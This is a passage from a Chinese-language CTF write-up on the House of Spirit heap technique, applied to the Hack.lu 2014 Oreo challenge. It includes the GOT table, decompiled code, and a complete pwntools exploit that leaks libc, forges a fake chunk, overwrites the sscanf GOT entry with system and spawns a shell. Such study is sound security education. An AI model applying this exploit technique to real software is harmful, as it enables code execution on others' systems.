<p>我们再通过申请一个0x40的chunk拿到对0x804a2a8的控制权，我们就可以把一个函数的got表地址写入到0x804a2a8中，我们应该选择哪一个函数呢，我们目标是把这个got表写入system函数，system函数的第一个参数需要是我们可以控制的，所以被复写的函数最好也是一个第一个参数是用户可控的函数，所有的GOT函数列表</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">printf	extern	0804A340	00000004	00000000	00000000	R	.	.	.	.	.	T	.</span><br><span class="line">free	extern	0804A344	00000004	00000000	00000000	R	.	.	.	.	.	T	.</span><br><span class="line">fgets	extern	0804A348	00000004	00000000	00000000	R	.	.	.	.	.	T	.</span><br><span class="line">__stack_chk_fail	extern	0804A34C	00000004			.	.	.	.	.	.	.	.</span><br><span class="line">malloc	extern	0804A350	00000004	00000000	00000000	R	.	.	.	.	.	T	.</span><br><span class="line">puts	extern	0804A354	00000004	00000000	00000000	R	.	.	.	.	.	T	.</span><br><span class="line">strlen	extern	0804A358	00000004	00000000	00000000	R	.	.	.	.	.	T	.</span><br><span class="line">__libc_start_main	extern	0804A35C	00000004	00000000	00000000	R	.	.	.	.	.	T	.</span><br><span class="line">__isoc99_sscanf	extern	0804A360	00000004			R	.	.	.	.	.	.	.</span><br><span class="line">__gmon_start__	extern	0804A364	00000004			R	.	.	.	.	.	.	.</span><br></pre></td></tr></table></figure>
<p>找来找去只有__isoc99_sscanf符合这个条件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">int sub_8048896()</span><br><span class="line">&#123;</span><br><span class="line">  int v1; // [esp+18h] [ebp-30h] BYREF</span><br><span class="line">  char s[32]; // [esp+1Ch] [ebp-2Ch] BYREF</span><br><span class="line">  unsigned int v3; // [esp+3Ch] [ebp-Ch]</span><br><span class="line"></span><br><span class="line">  v3 = __readgsdword(0x14u);</span><br><span class="line">  do</span><br><span class="line">  &#123;</span><br><span class="line">    printf(&quot;Action: &quot;);</span><br><span class="line">    fgets(s, 32, stdin);</span><br><span class="line">  &#125;</span><br><span class="line">  while ( !(__isoc99_sscanf)(s, &quot;%u&quot;, &amp;v1) );   //第一个参数是从fgets中读出来的可控的</span><br><span class="line">  return v1;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>所以我们通过申请一个0x40的chunk，然后给这个chunk赋值为sscanf的got表地址，这样就把0x804a2a8指向了sscanf.got的地址，如果我们再次调用leavemessage函数就可以让这个got表的值修改为system在 libc中的偏移地址了。之后在通过发送/bin/sh字符串，调用sscanf进而调用system得到shell。</p>
<h3 id="我的exp"><a href="#我的exp" class="headerlink" title="我的exp"></a>我的exp</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">target = process(argv=[&#x27;./ld-2.23.so&#x27;,&#x27;./oreo_origin&#x27;], env=&#123;&quot;LD_PRELOAD&quot;:&quot;./libc.so.6&quot;&#125;)</span><br><span class="line"># gdb.attach(target)</span><br><span class="line">elf = ELF(&#x27;oreo_origin&#x27;)</span><br><span class="line">libc = ELF(&quot;libc.so.6&quot;)</span><br><span class="line"></span><br><span class="line">def addRifle(name, desc):</span><br><span class="line">  target.sendline(&#x27;1&#x27;)</span><br><span class="line">  target.sendline(name)</span><br><span class="line">  target.sendline(desc)</span><br><span class="line"></span><br><span class="line">def leakLibc():</span><br><span class="line">  target.sendline(&#x27;2&#x27;)</span><br><span class="line">  print target.recvuntil(&quot;Description: &quot;)</span><br><span class="line">  print target.recvuntil(&quot;Description: &quot;)</span><br><span class="line">  leak = target.recvline()</span><br><span class="line">  puts_addr = u32(leak[0:4])</span><br><span class="line">  libc_base = puts_addr - libc.symbols[&#x27;puts&#x27;]</span><br><span class="line">  return libc_base</span><br><span class="line"></span><br><span class="line">def orderRifles():</span><br><span class="line">  target.sendline(&quot;3&quot;)</span><br><span class="line"></span><br><span class="line">def leaveMessage(content):</span><br><span class="line">  target.sendline(&quot;4&quot;)</span><br><span class="line">  target.sendline(content)</span><br><span class="line"></span><br><span class="line">addRifle(&#x27;1&#x27;*27 + p32(0x804A248) ,&#x27;123&#x27;)</span><br><span class="line">libc_addr = leakLibc()</span><br><span class="line">print(hex(libc_addr))</span><br><span class="line"></span><br><span class="line">for i in range(0,0x40-1):</span><br><span class="line">    addRifle(&#x27;123&#x27;,&#x27;123&#x27;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">target.sendline(&#x27;5&#x27;)</span><br><span class="line">res = target.recv()</span><br><span class="line">res = target.recv()</span><br><span class="line"></span><br><span class="line">addRifle(&#x27;A&#x27;*27 + p32(0x804A2A8),&#x27;123&#x27;)</span><br><span class="line"></span><br><span class="line">leaveMessage(&#x27;\x00&#x27; * 0x24 + p32(0x20))</span><br><span class="line"></span><br><span class="line">orderRifles()</span><br><span class="line"></span><br><span class="line">addRifle(&#x27;123&#x27;, p32(elf.got[&#x27;__isoc99_sscanf&#x27;]))</span><br><span class="line">addRifle(&#x27;A&#x27;*31 + p32(0x40) + p32(0x61),&#x27;123&#x27;)</span><br><span class="line">system = libc_addr + libc.symbols[&#x27;system&#x27;]</span><br><span class="line">leaveMessage(p32(system))</span><br><span class="line">target.sendline(&#x27;/bin/sh&#x27;)</span><br><span class="line">target.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h2><p>hos攻击的应用场景是比较苛刻的，需要能够有一个逻辑能触发错误的free, 目标地址的前面和后面都要是可控的才能满足两个size的检测。在实际的漏洞挖掘利用中，笔者感觉很难见到。<br><img src="/images/heap_exp//2021-06-15-09-51-20.png"><br>new_rifle_num可控，dword_804A2A8是我们的目标地址（但是不可控），off_804A2C0后面的可控，还有一个free，才能达到house of spirit的条件，实现对dword_804A2A8的控制</p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p>1.<a target="_blank" rel="noopener" href="https://guyinatuxedo.github.io/39-house_of_spirit/house_spirit_exp/index.html">https://guyinatuxedo.github.io/39-house_of_spirit/house_spirit_exp/index.html</a><br>2.<a target="_blank" rel="noopener" href="https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit">https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit</a><br>3.<a target="_blank" rel="noopener" href="https://github.com/guyinatuxedo/nightmare/tree/master/modules/39-house_of_spirit/hacklu14_oreo">https://github.com/guyinatuxedo/nightmare/tree/master/modules/39-house_of_spirit/hacklu14_oreo</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/atom.xml">RSS</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%AA%E4%BA%BA%E6%80%BB%E7%BB%93%E7%9A%84%E6%89%93%E5%8D%B0libc%E5%9C%B0%E5%9D%80%E7%9A%84%E5%87%A0%E7%A7%8D%E6%96%B9%E6%B3%95"><span class="toc-number">1.</span> <span class="toc-text">个人总结的打印libc地址的几种方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%9D%E8%B7%AF%E5%B0%9D%E8%AF%95"><span class="toc-number">2.</span> <span class="toc-text">思路尝试</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">3.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#house-of-spirit%E4%BE%8B%E7%A8%8B"><span class="toc-number">4.</span> <span class="toc-text">house of spirit例程</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Hack-lu-2014-Oreo"><span class="toc-number">5.</span> <span class="toc-text">Hack.lu 2014 Oreo</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9E%84%E5%BB%BA%E8%B0%83%E8%AF%95%E7%8E%AF%E5%A2%83"><span class="toc-number">5.1.</span> <span class="toc-text">构建调试环境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%86%E5%90%91%E5%AE%A1%E8%AE%A1"><span class="toc-number">5.2.</span> <span class="toc-text">逆向审计</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF"><span class="toc-number">5.3.</span> <span class="toc-text">利用思路</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%B0%9D%E8%AF%95fastbin%E6%94%BB%E5%87%BB"><span class="toc-number">5.3.1.</span> <span class="toc-text">尝试fastbin攻击</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%B0%9D%E8%AF%95%E6%B3%84%E9%9C%B2libc%E5%9C%B0%E5%9D%80"><span class="toc-number">5.3.2.</span> <span class="toc-text">尝试泄露libc地址</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%BB%93%E5%90%88%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%9C%AC%E8%BA%AB%E7%9A%84%E4%B8%9A%E5%8A%A1%E9%80%BB%E8%BE%91"><span class="toc-number">5.3.3.</span> <span class="toc-text">结合二进制本身的业务逻辑</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%88%91%E7%9A%84exp"><span class="toc-number">5.4.</span> <span class="toc-text">我的exp</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BB%93%E8%AF%AD"><span class="toc-number">6.</span> <span class="toc-text">结语</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83"><span class="toc-number">7.</span> <span class="toc-text">参考</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/&text=堆利用系列八：House of Spirit"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/&title=堆利用系列八：House of Spirit"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/&is_video=false&description=堆利用系列八：House of Spirit"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=堆利用系列八：House of Spirit&body=Check out this article: https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/&title=堆利用系列八：House of Spirit"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/&title=堆利用系列八：House of Spirit"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/&title=堆利用系列八：House of Spirit"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/&title=堆利用系列八：House of Spirit"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/&name=堆利用系列八：House of Spirit&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://colorlight.github.io/2021/06/17/%E5%A0%86%E5%88%A9%E7%94%A8%E7%B3%BB%E5%88%97%E5%85%AB%EF%BC%9A%C2%96House-of-Spirit/&t=堆利用系列八：House of Spirit"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2021
    Colorlight
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/atom.xml">RSS</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->


</body>
</html>
